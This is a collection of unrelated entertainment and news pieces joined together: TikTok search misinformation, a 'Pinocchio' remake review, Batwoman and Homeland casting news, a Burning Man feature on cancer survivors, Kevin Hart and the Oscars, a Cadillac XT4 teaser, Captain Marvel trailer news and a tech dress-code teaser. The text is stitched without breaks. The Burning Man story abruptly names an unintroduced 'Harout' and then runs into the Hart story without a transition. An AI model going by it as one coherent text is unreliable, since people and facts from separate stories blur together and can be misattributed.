TikTok is no longer just a place for viral dances and food hacks. Gen Z users have begun replacing Google with TikTok as their primary search engine, The New York Times recently reported.
That might be a serious predicament.
A new study by NewsGuard, a site that monitors misinformation across the internet, found that one in five search results on TikTok contains misinformation. The study analyzed the top 20 search results across 27 different news topics ranging from "2022 election" to "mRNA vaccine."
NewsGuard's study found that TikTok also prompted users with biased search terms. For example, if a user searched for "covid vaccine." TikTok would offer suggestions for more biased search terms such as "covid vaccine truths" or "covid vaccine hiv." More than half of the search results that popped up about the 2022 midterm elections contained "hyper-partisan left-leaning rhetoric," the study noted.
The rampant misinformation on TikTok is particularly significant given the number of home remedy videos circulating on the platform. The ongoing baby formula shortage has led to a nebula of videos promoting DIY baby formula that pediatricians have labeled as "dangerous."
After the Supreme Court's decision to overturn Roe vs. Wade, herbal remedies for abortion began trending on TikTok. Videos that suggested everything from bitter garnish parsley to mugwort, a flowering plant, were toted as remedies for abortion. Insider reported that a TikTok video that suggests that mugwort can induce a miscarriage had over 1 million views on TikTok. The National Center for Complementary and Integrative Health noted that "very little research has been done on Mugwort in people."
Meghna T., a senior from suburban Michigan, said that if she's searching for anything health or education related she still uses Google. For "everything else" though she turns to TikTok.

“Pinocchio” is the latest Disney animated film to get an updated “live-action” remake in our contemporary times. The 1940 original is rightfully a classic — a film that pushed the boundary of what animation can bring to the screen and a story about a boy’s earnest search to find out who he is. Robert Zemeckis’ remake, however, fails to capture the heart of the original. It’s poorly paced, full of actors talking in multiple variants of accented English that make Dick Van Dyke’s Cockney accent seem good in comparison, and delivers major characters who are stilted, disjointed, and lacking life.
The story of Zemeckis’ “Pinocchio” largely follows that of the original film, inspired by “The Adventures of Pinocchio” by Carlo Collodi. An old woodworker named Geppetto wishes on a star for Pinocchio, a wooden puppet he made, to become a real boy. Geppetto gets his wish, although Pinocchio remains made of wood and must prove himself to become “a real boy.” With Jiminy Cricket as his conscience, Pinocchio faces unexpected adventures such as becoming famous (and summarily exploited and imprisoned for it); getting sent to a place called Pleasure Island where bad children literally become jackasses; and culminates inside the belly of a giant sea monster. Throughout this journey, Pinocchio learns to be brave, truthful, and unselfish. Just like a real boy.
The original Disney movie came out over 80 years ago and is a product of its time. And as such, the remake updates certain things that haven’t fared well over the decades (you won’t, for example, see any kids sucking on cigarettes and getting wasted). Those are welcome changes, but the movie fails on almost every other front, even though the major plot points are essentially the same. It’s like someone put all the components of the original into a blender and turned the appliance on without a lid. The result is a big old mess; a story barely cobbled together by a series of painfully bad jokes and horrific Southern, French, Italian, and New York “Newsies” accents.

Before I get into the bad, let me give credit to the good in “Pinocchio.” The movie does contain moments that aren’t terrible. Cynthia Erivo’s Blue Fairy, the magical being who bestows Pinocchio with sentience, has empathy and warmth that’s hard to find elsewhere in the film. Jaquita Ta’le’s performance as the puppeteer that befriends Pinocchio is also a bright spot in a tale full of garish characters whose personalities are as flimsy and superficial as the production’s visual effects.
Other good things? For those of you who like Easter eggs, Geppetto’s cuckoo clocks might do something for you, as we see renditions of everything from “Snow White” to “Roger Rabbit” in the clock’s designs. For those of you who don’t like overly obvious references to Disney’s IP portfolio, however, these references might just be another thing that makes you want to hurl your remote at your television.
One of the best things I can say about the movie is that it likely won’t be one that your child will want to watch over and over, which means you won’t have to, either. It starts out slow, with Geppetto (a befuddled Tom Hanks) giving a 20-minute rambling soliloquy about how he misses his dead wife and son and how he made a wooden boy puppet to fill his lonely days. Why didn’t he make a new son the more conventional way? As Joseph Gordon-Levitt’s Jiminy Cricket explains later in his horrific pseudo-Southern accent, poor ol’ Geppetto doesn’t get out much. Apologies if you — like I did after Jiminy’s observation — get some imagery in your head that you never asked for. I’m just thankful that Geppetto decided to make a wooden replica of his dead son rather than his wife, although a Geppetto version of “Lars and the Real Girl” would arguably be a more intriguing and thought-provoking movie to watch.

If you and/or your child make it past the first 20 or so minutes of “Pinocchio,” you’ll be submitted to a series of wisecracks about Pinocchio being made of pine wood, so much so that you might think this is a crucial piece of information that comes into play later (reader, it does not, although you will be subjected to a horrible Chris Pine punchline). You’ll also have to endure the movie’s lackluster visual effects. It’s clear Disney knew it didn’t have a “Lion King” live-action remake on its hands and cut the budget accordingly. The CGI characters’ uncanny valleys are deep, and the spectacle of Pleasure Island is poorly rendered to the point of distraction. Pinocchio himself looks decent, although he did the “I can rotate my head 360 degrees” bit a few too many times, reminding you that puppets — even ones as annoyingly earnest as Pinocchio — are just plain creepy.
Monstro, the giant sea monster who swallows Pinocchio and Geppetto whole, is also suitably scary and one of the less-bad things about the film, especially the monster’s insides, which captures glimmers of the dark-yet-adventurous tone that I yearned for throughout the film.
And while the ending thankfully veers away from the message that one should strive to change themselves to make their parents happy, the “twist” occurs almost as an afterthought and is given barely a minute of genuflection before the credits begin. That crucial moment could be easily missed by a young person or a casual viewer, and in a worst-case scenario, might leave them thinking the opposite of the ultimate message the movie is trying to convey.
That’s not great, much like the rest of the movie. And as a parent myself, if faced with the choice of watching this film again with my child versus caving into her request to watch “Frozen” for the 35th million time, I would unhesitatingly get ready to hear “Let It Go” than rewatch this remake.
/Film Rating: 3 out of 10

A Bat-mystery has been solved.
Batwoman showrunner Caroline Dries has shed some light on the decision to not recast the role of Kate Kane, in the wake of Ruby Rose abruptly parting ways with the CW series, but instead create “a whole new character” to slip into the cape and cowl for Season 2.
As recently reported, Batwoman has put out a casting call for a new character (possibly code-)named “Ryan Wilder,” who is described as “likeable,” “goofy,” and a “highly skilled [but] wildly undisciplined” fighter. She will, hopefully sooner rather than later once Season 2 arrives in early 2021, come to adopt the vigilante persona of Batwoman.
A June 3 TVLine op-ed called into question the change-up, given how it will likely render meaningless so much of what was established during Season 1. Now Dries, in an ATX Festival At Home Q&A with fellow CW showrunner Julie Plec (of Legacies), spoke about the decision for the first time since Season 1 ended.
“To be honest with you, I did consider the ‘soap opera version’ [of recasting] for a hot minute, because selfishly we already had a couple episodes written, and transition-wise it would be seamless,” she told Plec. “But upon further reflection — and I think [Arrowverse EP] Greg [Berlanti] helped me make this call — he’s like, ‘I think we should just reboot Batwoman as a different character.’”
In addition to paying “respect to everything that Ruby [Rose] put into the Kate Kane character” during Season 1, Dries said, “it also helps the audience, because we’re not asking them to address ‘the elephant in the room’” by accepting a new face as the same person.
Dries went on to affirm that “Ryan Wilder” is “a whole new character who in her past was inspired by Batwoman, so she is going to take on the mantle,” adding that the scrappy twentysomething who lives in a van, with her plant, “is maybe not the right person at the time to be doing it, so that’s what makes it fun.”

Earlier this year, Ben Savage played a Young Mandy Patinkin in the penultimate episode of Criminal Minds. Two months later, he played a Young Mandy Patinkin in the penultimate episode of Homeland.
His casting on the Showtime thriller, as you can imagine, was no coincidence.
For the purpose of flashbacks to East Berlin circa 1986, in which the oneday CIA bigwig began cultivating an asset, Homeland “went through so many discussions about how we would portray the Young Saul,” co-creator/executive producer Alex Gansa tells TVLine. For starters, “There was some talk of trying to make Mandy (who is 67 in real life) look like he was in his late 20s,” Gansa shares. “But we did some tests and it just wasn’t believable.”
Producers briefly considered hiring one of Patinkin’s two non-actor sons, both of whom are in their 30s, while also bringing actors to read for the role. And while Gansa was unaware that 39-year-old Savage, best known for TV’s Boy Meets World, had twice played a younger version of Patinkin’s Jason Gideon on CBS’ Criminal Minds, luckily someone in his camp remembered that spot-on casting.
“I think it was Judy Henderson, our casting director, who was aware of that,” Gansa offers. “And when Ben came in to read, the resemblance is so strong it felt like the smart thing to do. He just bears such an uncanny resemblance to Mandy.”
Savage’s latest turn as a Young Patinkin wound up not being a speaking role per se, however. Instead, line readings in Patinkin’s own, very distinctive voice were dubbed in for the flashbacks, to further create the illusion of his younger self.
The series finale of Showtime’s Homeland airs this Sunday, April 26 at 9/8c.

Deep in the Black Rock Desert—and arguably even deeper into the Burning man experience—a hardy crew of cancer patients are burying their diagnoses in the dust.
The sun is beating down over one of the most inhospitable places on the planet and I can’t remember the last time I slept.
I’m standing beneath a 23-meter-high effigy, listening to a woman named Cinemagirl share her experience of surviving cancer. Her eyes are watering. “I’m not crying because I’m sad,” she says. “I’m crying because of all the love I’ve been given.”
A small crowd begins to walk solemnly towards the Temple, Burning Man’s spiritual focal point where participants go to memorialize the dead. In my two years at the 75,000-person ‘social experiment’ on a dried-out lakebed in Nevada, I’d avoided the Temple—I always felt it was too much of a bummer. But this time is different.
In 2016, Slim was diagnosed with stage four colon cancer. Thinking it might be his last Burn (he’d been to 22 straight), he created a schedule that allowed him to attend as much of it as he could. “We cut it really close,” Slim says. “Once, I literally drove directly back from Burning Man to the hospital for my next infusion. I was still so covered in dust that I was worried they’d turn me away.”
RELATED: Photos from the desert utopia of Burning Man
While physically draining, Slim says Burning Man gave him the strength to complete his treatment: “Coming out here, connecting with my burner family, and feeling the incredible love and support this community has to offer was priceless. Lifesaving.”
With Slim’s plans to quit Burning Man tossed, a thought struck him: What if he could offer other cancer patients a similar experience?
A few feet away, another crowd had formed around Carolyn Monroe, an 81-year-old first-time Burner from the San Fernando Valley who beamed an unapologetic zest for life that rivals anyone a fraction of her age.
Carolyn’s hair is painted bright blue and colorful spiked rings decorate her fingers. She’s also a cancer patient who was gifted a ticket from the Burning Man community, though not from Slim’s program. Carolyn postponed her last chemotherapy appointment when her son got her a ticket from his campmates. “I didn’t even know that much about Burning Man,” says Carolyn. “They said it’s crazy. And I said, ‘Fine—I’m in.’”
At Burning Man, Carolyn rides around on a tricycle and on top of a dragon ‘art car’ while wearing a brass steampunk mask. After it’s all over, she says she’ll wear some of the gifts she received to her final chemo appointment.
A couple of days later, I grab my scarf and goggles and hop on my bike—it takes mere seconds before I’m seduced to stop. Should I go eat that steak barbecue? Should I be slurping on a snow cone? Do I have time to hit the beard spa? I’m on my way to meet Gordon Farber, a Burning Wish participant who had come all the way from South Africa and was gifted a ticket just five days before the event.
RELATED: Is travel the best medicine?
Gordon, 49, has recently gone into remission from Hodgkin’s Lymphoma and has been spending his Burn partying, day and night, with a protective mask on. Farber’s brother, Rowan—who proposed to his girlfriend on a whim with a toy ring last night—recalls how hard it was for the whole family when Gordon was going through chemo. Yet here he was, letting loose and dancing alongside the DJs.
“The thing cancer taught me is your life can change in just one phone call,” Gordon says. “We’re always worrying about tomorrow, working for tomorrow, planning for tomorrow and saving for tomorrow. Truth be told, that tomorrow might never come, so you’ve got to be in the present.”
He came to that conclusion after seeing a silhouette biking in the ‘deep playa.’ “All you see is just one soul easily going into the dust,” he says. “And at that moment I just realized, if not now, my time will come. And when it does, I don’t want to have any fucking regrets.”
Now, Harout plans to save up so he can help other people experience what he did.
As I sit with Harout and tens of thousands of others in the middle of nowhere in front of the Man, with nine days of hedonism, mind-blowing art, and thousands of hugs in the rearview, I couldn’t tell which was more powerful: The blazing inferno bursting from the 23-meter-high Man, or the childlike joy beaming from the survivor beside me.
Hart was initially unveiled as the presenter of the iconic awards bash late last year, until a huge homophobia furore erupted – based on clips from his stand-up routines and numerous tweets with derogatory language from several years ago. He stepped down, leaving the Oscars officially host-less. But the row returned to prominence this week when he appeared on Ellen DeGeneres’ chatshow.
DeGeneres – herself a trailblazing, openly gay woman – has said she believes Hart should be given a second chance and forgiven, but this has been met with criticism online.
Hart said in the interview with her that has apologised for his past derogatory language multiple times in the past, but the likes of Variety and CNN’s Don Lemon have countered that, despite thorough investigation, there is no clear evidence of this.
It was reported that the Academy would be open to reinstating Hart as host if he indicated that he was interested – and remorseful.
But despite claims that the Academy were satisfied with Hart’s attempts to resolve the controversy, it seems he himself does not want to come back.
According to Deadline, the actor and comedian fears he would become a distraction from the actual ceremony.
And while the door is reportedly open for him to change his mind, it now seems very unlikely that Hart will be the presenter.
So what will happen instead?
The US industry publication suggests the ceremony will have multiple stars presenting awards – but no single main host.
Deadline claims that Hart did “reconsider” his involvement, but wants to end the “controversial narrative” that has plagued his hiring.
He is also said to be concerned about how much time would have to prepare if he was to be re-employed.
The 91st Academy Awards are slated to take place on February 24, 2019.
The nominations will be unveiled on Tuesday, January 22.

We’ve gotten so used to GPS navigation system on smartphones and in vehicles that at Business Insider, when we encounter a car that doesn’t have a mapping setup, it can be sort of disorienting (pardon the pun).
Every so often, this happens on a mass-market vehicle. It almost never happens with a luxury car. And even when we think we might not have GPS mapping, we’ve been known to push buttons and dig around in an infotainment system in the vain hope that we might find some colorful digital coordinates.
That quest was familiar when I recently sampled the all-new 2019 Cadillac XT4, a compact crossover SUV from the luxury brand. My test car, which priced at about $ 52,000, did not include a $ 1,500 optional technology package that would have added mapping (along with some other features).
The XT4 was rather superb, but in at least one respect it was a throwback for me: instead of mapped directions, with that familiar colored line to follow on a route, it showcased turn-by-turn navigation accessed through General Motors’ good old OnStar system.
How did turn-by-turn compare with the more “modern” systems? Read on to find out.

In a bizarre move – as the long, long wait for a first look at Avengers 4 continues – Kevin Feige’s studio has instead promised a full trailer for Captain Marvel, which hits cinemas in March. This vaguely – but not quite – aligns with a previous rumour suggesting an Avengers 4 trailer would come on Monday, followed by Captain Marvel on Wednesday. Were the two films just the wrong way around?
Whether Marvel will put out a trailer on Wednesday still remains to be seen, but we now know that the Monday slot was for Captain Marvel – not the Spring-due ensemble blockbuster.
The Marvel Studios account posted: “Check out the new poster and tune-in to @ESPN’s Monday Night Football to see the brand new trailer for Marvel Studios’ #CaptainMarvel.”
Indeed, the Monday Night Football coverage was exactly when the Avengers 4 trailer was previously alleged to be landing.
But still, a Captain Marvel trailer is still hugely exciting – not least because the teaser, released in September, was criticised for not showing enough of Brie Larson’s titular hero.
The new poster puts her very definitively front-and-centre, with the blue and red colour scheme popping along with a mixture of Earth and outer space settings.
Alongside Larson, actors Samuel L Jackson, Ben Mendelsohn, Djimon Hounsou, Lee Pace, Lashanna Lynch, Gemma Chan, Annette Being, Clark Gregg and Jude Law are billed along the top.
Avengers 4 will also star Larson and focus will now be on whether the trailer lands on Wednesday – along with the movie’s official name.
Unsurprisingly, there’s no word yet from Marvel on whether or not this is the case.
It’s been a long wait for footage from the film: anticipation has hit feverish heights over recent days, with several alleged drop-dates coming and going.
Now that the anniversary of the Infinity War trailer’s release has been and gone, fans are more on edge than ever.
Whatever happens, Marvel probably don’t need to worry about box office performance: Infinity War was a mutli-billion-dollar grossing record-breaker, and its sequel will likely be one of the biggest films in Hollywood history.
Even if we do have to wait a little longer for any details whatsoever.
Captain Marvel is out on March 8. In the UK, Avengers 4 is currently slated for April 26.

Dressing for success means something different in Silicon Valley.
You won’t find many buttoned-up power suit aficionados at your average tech office. In many ways, Silicon Valley rapidly accelerated the decades-long decline of formality in office-wear in the 1990s. Even today, as tech-minded employees are hauling in impressive paychecks, the industry is famous for its laid-back style.See the rest of the story at Business Insider
